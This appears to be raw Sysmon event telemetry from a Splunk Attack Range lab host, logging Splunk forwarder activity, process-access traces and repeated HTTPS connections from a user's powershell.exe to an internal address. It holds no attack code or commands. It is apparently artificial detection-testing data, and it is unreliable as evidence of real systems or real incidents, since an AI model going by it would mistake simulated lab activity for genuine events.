Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=300F89A6698B2499FD5E26E5C6C2F04C,SHA256=655D542177D2EC786E1ABF30EF5A02B56BAD3B5D9A784EC477D86AFFD53C6544,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:26.659{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50382-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:56.008{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=83F1952E46F36DAF8F04DEB2C11BF2CD,SHA256=995B15436412DBAF39BDA4AB9DD20D464AEF219CB9A8663471E9F55C21133934,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:57.407{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A00F4204BDD47DB61DD9C5AFED6C5BB,SHA256=658BA1F735F36E9A630897CAE0993FF4523DAA18CC79363107907F212317E33C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:26.758{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50383-false10.0.1.12-8000- 23542300x800000000000000036496229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:58.440{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3149B8208AF52F09F7C600ECBA2975D6,SHA256=7B974150D55315DE9F0D0BB3DAB0E3CAB4A5EE29144B6335E1D58304988A1967,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:59.485{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB1F981E618CB519AA6773C85A171E45,SHA256=EAB60B7FBDE1356B7A34E203F114DEC78B0418F376ECF898A9BFCDF47F740452,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:00.503{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65ACC201933D2597B338F115D1A2AB78,SHA256=42AC68F96BEDDC3A06451BE6EDC1094285A16F5000CB3AAEA231213E8C8716D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:30.665{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50384-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:00.222{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B05A6B52539C4FD67682B8A269D2F7FC,SHA256=FB27DBA9F06455C402ADEB3E8C947CF48487E3967D9B13E2313E3B65EA5DD6FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:01.536{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5576DCC2F9387034B0FA3D4E10540AB9,SHA256=A2C2BF0BD550E756BAC8DDC4F46AFD51D99110C03D34D749FAC802F6614FA5AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:02.567{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F2F8B7B99942BAA4BD95D2749A4615A,SHA256=6ACF428C7D3C96ED586FEC38F1E0B5355D51BABFD092047E8C3475F6D8FB0BA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:32.747{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50385-false10.0.1.12-8000- 23542300x800000000000000036496237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:03.600{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BE4B69FC3870C4091528ACE5F2F27DB,SHA256=76DF475FF95558681348FDDCB9D9F4F26C4B3D19EB23F4C3F5124117779A7A9B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:04.620{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B85FE77D66D8C47996CEA94A5FDBEAE6,SHA256=AD11D67E459C4E3BCB0C95FCE852A82533FBC235ABC392432CC21B920F165633,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:05.634{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AE2BFF9B82C198E6DFEFC96B4022598,SHA256=910E4B205AC2C7C1C8D6149A6A77E9AFF3700133EBF64A76C48E70394259DDAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:05.035{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=161F7887C726E4084C384D20CBFA0B9E,SHA256=CC64FD2AF0A4D536DD7D26DBD3A20EF8927BD06B2B052E31B9EFDFE3E1F269D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:06.649{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E81DC764909CA42F984359E9729B973,SHA256=6994AD242F554DE8DDE9AF890272772527BAFE2D8695AB8D24FD972266790F24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:35.677{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50386-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:07.663{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CAAFE31279F4C778E1C5B884F978B2C,SHA256=BAA565D3157AB880F1590479CD32F0E368677005819A8F7F93874ABFF7DE18A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:08.799{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F6C-6140-5356-04000000C801}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.797{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:08.797{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.796{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:08.796{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.796{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9F6C-6140-5356-04000000C801}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.796{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F6C-6140-5356-04000000C801}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.778{B81B27B7-9F6C-6140-5356-04000000C801}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.699{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE152817635A6ADB928EAAD15953DEA7,SHA256=F7B8A3187E46C947F24D2908A1F4F171B1F6E0BF39C96A1D091AC4117A7D79B4,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 354300x800000000000000036496253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.774{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50387-false10.0.1.12-8000- 10341000x800000000000000036496252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.262{B81B27B7-9F6C-6140-5256-04000000C801}67242936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.100{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F6C-6140-5256-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:08.100{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.100{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:08.100{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.100{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:08.100{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-9F6C-6140-5256-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.100{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F6C-6140-5256-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:08.079{B81B27B7-9F6C-6140-5256-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
